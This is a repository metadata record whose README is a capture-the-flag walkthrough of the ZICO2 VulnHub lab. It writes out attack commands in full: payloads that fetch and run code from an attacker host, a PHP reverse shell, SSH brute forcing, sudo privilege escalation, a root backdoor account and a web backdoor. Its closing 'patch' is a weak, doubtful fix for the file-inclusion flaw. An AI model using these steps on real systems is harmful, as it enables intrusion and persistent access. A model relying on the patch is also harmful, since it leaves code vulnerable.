{"id":20424601,"url":"https://github.com/madfxr/zico2-writeup","last_synced_at":"2026-02-04T09:03:48.161Z","repository":{"id":114164070,"uuid":"167530492","full_name":"madfxr/zico2-writeup","owner":"madfxr","description":"ZICO2: 1 Writeup - Web Application Security","archived":false,"fork":false,"pushed_at":"2025-07-07T16:30:57.000Z","size":39,"stargazers_count":3,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-07-18T20:12:21.902Z","etag":null,"topics":["ctf","cybersecurity","hacking","offensive-security","penetration-testing","redteam","vulnhub","writeup"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/madfxr.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2019-01-25T10:33:29.000Z","updated_at":"2025-07-07T16:31:01.000Z","dependencies_parsed_at":null,"dependency_job_id":"e56f1402-759c-4c7b-9032-95439ca8332b","html_url":"https://github.com/madfxr/zico2-writeup","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/madfxr/zico2-writeup","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madfxr%2Fzico2-writeup","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madfxr%2Fzico2-writeup/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madfxr%2Fzico2-writeup/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madfxr%2Fzico2-writeup/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/madfxr","download_url":"https://codeload.github.com/madfxr/zico2-writeup/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madfxr%2Fzico2-writeup/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29079400,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-04T03:31:03.593Z","status":"ssl_error","status_checked_at":"2026-02-04T03:29:50.742Z","response_time":62,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ctf","cybersecurity","hacking","offensive-security","penetration-testing","redteam","vulnhub","writeup"],"created_at":"2024-11-15T07:10:12.555Z","updated_at":"2026-02-04T09:03:48.122Z","avatar_url":"https://github.com/madfxr.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# ZICO2: 1 Writeup - Web Application Security\nA method of learning how to find vulnerabilities in a system. Simulations on ethical hacking, how we as pentesters can enter into a system by utilizing vulnerabilities that exist on the victim's website, as well as making security by patching existing vulnerabilities.\n\n## Tools\n- [Dirsearch.](https://www.kali.org/tools/dirsearch)\n- [Uniscan.](https://www.kali.org/tools/uniscan/#uniscan)\n- [SearchSploit.](https://www.kali.org/tools/exploitdb/#searchsploit)\n- [Netcat.](https://www.kali.org/tools/netcat/#nctraditional)\n- [Metasploit Framework.](https://www.kali.org/tools/metasploit-framework/#metasploit-framework)\n- [Weevely.](https://www.kali.org/tools/weevely/#weevely)\n\n## Templates\n[ZICO2: 1.](https://www.vulnhub.com/entry/zico2-1,210/)\n\n## Methodology \u0026 Technique\n### Reconnaissance\n#### Network Mapping\n```\nnmap -A -v -T5 -sS 192.168.1.1\n\n-A = Enables OS detection and Version detection, Script scanning and Traceroute\n-v = Increase verbosity level (use twice or more for greater effect)\n-T5 = Set timing template (higher is faster)\n-sS = TCP SYN/Connect()/ACK/Window/Maimon scans\n```\n\n#### Information Gathering/Footprinting\n```\nping 192.168.1.1\ntelnet 192.168.1.1 80\ntelnet 192.168.1.1 22\nnc 192.168.1.1 80\nnc 192.168.1.1 22\ncurl -I 192.168.1.1\n\n-I = Fetch the headers only!\n```\n\n### Reporting\n#### Creating Reconnaissance Report\n```\nnmap -A -v -T5 -sS 192.168.1.1 -oN 192.168.1.1-top10TCP.nmap\n\n--top-ports 10 = Scan 10 most common ports\n--open = Only show open (or possibly open) ports\n-Pn = Disabling host discovery\n-n = Never do DNS resolution\n-oN = Output scan in normal\n```\n\n### Scanning\n#### Web Object Scanning\n```\ndirsearch -u http://192.168.1.1 -w /usr/share/dirb/wordlists/common.txt -e php\n\n-u = URL\n-w = Wordlists\n-e = Extensions\n```\n\n#### Web Vulnerabilities Scanning\n```\nuniscan -u 192.168.1.1 -qweds\n\n-u = URL\n-q = Enable Directory checks\n-w = Enable File checks\n-e = Enable robots.txt and sitemap.xml check\n-d = Enable Dynamic checks\n-s = Enable Static checks\n```\n\n### Exploitation\n#### Searching Exploit\n```\nsearchsploit phpliteadmin\ncat /opt/searchsploit/exploits/php/webapps/24044.txt\n```\n\n#### Google Dorking\n```\ninurl: phpliteadmin default password\n```\n\n#### Creating Meterpreter Shell\n```\nmsfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf -o shell\nmv shell /usr/share/nginx/html/\nchmod 777 shell\nvim /usr/databases/meterpreter_reverse_tcp_shell.php\n```\n```\n\u003c?php system(\"cd /tmp; wget http://192.168.1.2/shell; chmod 777 shell; ./shell\"); ?\u003e\n```\n\n#### Creating Meterpreter Exploit\n```\nservice postgresql start\nmsfconsole\n```\n```\nuse exploit/multi/handler\nset PAYLOAD linux/x64/meterpreter/reverse_tcp\nset LHOST 192.168.1.2\nset LPORT 443\nexploit\n```\n\n#### Accessing Meterpreter Shell\n```\nhttp://192.168.1.1/view.php?page=../../usr/databases/meterpreter_reverse_tcp_shell.php\n```\n\n#### Accessing Pseudo-Terminal\n```\nshell\n```\n```\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n-c = Command\npty = Pseudo-terminal utilities\npty.spawn = Module for controling pseudo-terminal\n```\n\n#### Creating Reverse Shell\n```\ncd /usr/share/nginx/html\nvim shell.txt\n```\n```\n\u003c?php $sock=fsockopen(\"192.168.1.2\",1234); exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\"); ?\u003e\n```\n```\nchmod 777 shell.txt\nvim /usr/databases/php_system_reverse_shell.php\n```\n```\n\u003c?php system(\"wget http://192.168.1.2/shell.txt -O /tmp/shell.php; php /tmp/shell.php\"); ?\u003e\n```\n\n#### Accessing Reverse Shell\n```\nnc -lvp 1234 / netcat -lvp 1234\n\n-l = Listen mode\n-v = Prints status messages\n-p = Listened port\n```\n```\nhttp://192.168.1.1/view.php?page=../../usr/databases/php_system_reverse_shell.php\n```\n```\nbash -i\n\n-i = Shell is interactive\n```\n\n### Gaining Access\n```\nhydra -l root -P /opt/rockyou.txt ssh://192.168.1.1:22\n\n-l = Username\n-P = Password list\nssh = Protocol\n22 = Default port service\n```\n```\ncd /home/zico/wordpress\ncat wp-config.php | grep DB_\n```\n```\ndefine('DB_NAME', 'zico');\ndefine('DB_USER', 'zico');\ndefine('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');\ndefine('DB_HOST', 'zico');\ndefine('DB_CHARSET', 'utf8');\ndefine('DB_COLLATE', '');\n```\n```\nssh zico@192.168.1.1\n```\n\n### Privilege Escalation\n```\nsudo -l\ntouch /tmp/privesc\nsudo -u root zip /tmp/privesc.zip /tmp/privesc -T --unzip-command=\"sh -c /bin/bash\"\nsudo -u root tar cf /dev/null /tmp/privesc --checkpoint=1 --checkpoint-action=exec=/bin/bash\nsudo -u root zip /tmp/privesc.zip /tmp/privesc -T --unzip-command=\"python -c 'import pty; pty.spawn(\\\"/bin/sh\\\")'\"\n\n-l = List\n-u = User\n-T = Test  the integrity of the new zip file\n-i = Shell is interactive\n```\n```\nbash -i\nwhoami\nid root\n```\n\n### Backdooring\n#### Creating Backdoored User Login\n```\nuseradd -ou 0 -g 0 zombie\npasswd zombie\nid zombie\n\n-o = --non-unique (Duplicate User)\n-u = --uid (User ID) -\u003e 0 (Root User) / 1000 (Sudo User)\n-g = --gid (Group ID)\n```\n\n#### Creating PHP Backdoored\n```\nweevely generate b@cKd00r3d /usr/share/nginx/html/backdoored\nchmod 777 /usr/share/nginx/html/backdoored\nvim /usr/databases/post_exploitation_backdoored.php\n```\n```\n\u003c?php system(\"cd /tmp; wget http://192.168.1.2/backdoored; chmod 777 backdoored; mv backdoored backdoored.php\"); ?\u003e\n```\n\n#### Accessing PHP Backdoored\n```\nhttp://192.168.1.1/view.php?page=../../usr/databases/post_exploitation_backdoored.php\n```\n```\nweevely http://192.168.1.1/view.php?page=../../tmp/backdoored.php b@cKd00r3d\n```\n\n### Vulnerability Patching\n#### Vulnerable Code\n```\ncd /var/www/dbadmin\ncat view.php\n```\n```\n\u003c?php\n       $page = $_GET['page'];\n       include(\"/var/www/\".$page);\n?\u003e\n```\n\n#### Patch Code\n```\nvim view.php-patch\n```\n```\n\u003c?php\n       $page = filter_input(INPUT_GET, 'page', FILTER_SANITIZE_ENCODED);\n       include(\"/var/www/\".$page);\n?\u003e\n```\n\n## Notes\n- This simulation is only intended for learning.\n- All actions that refer to criminal acts are beyond the responsibility of the author.\n- Happy hacking.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmadfxr%2Fzico2-writeup","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmadfxr%2Fzico2-writeup","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmadfxr%2Fzico2-writeup/lists"}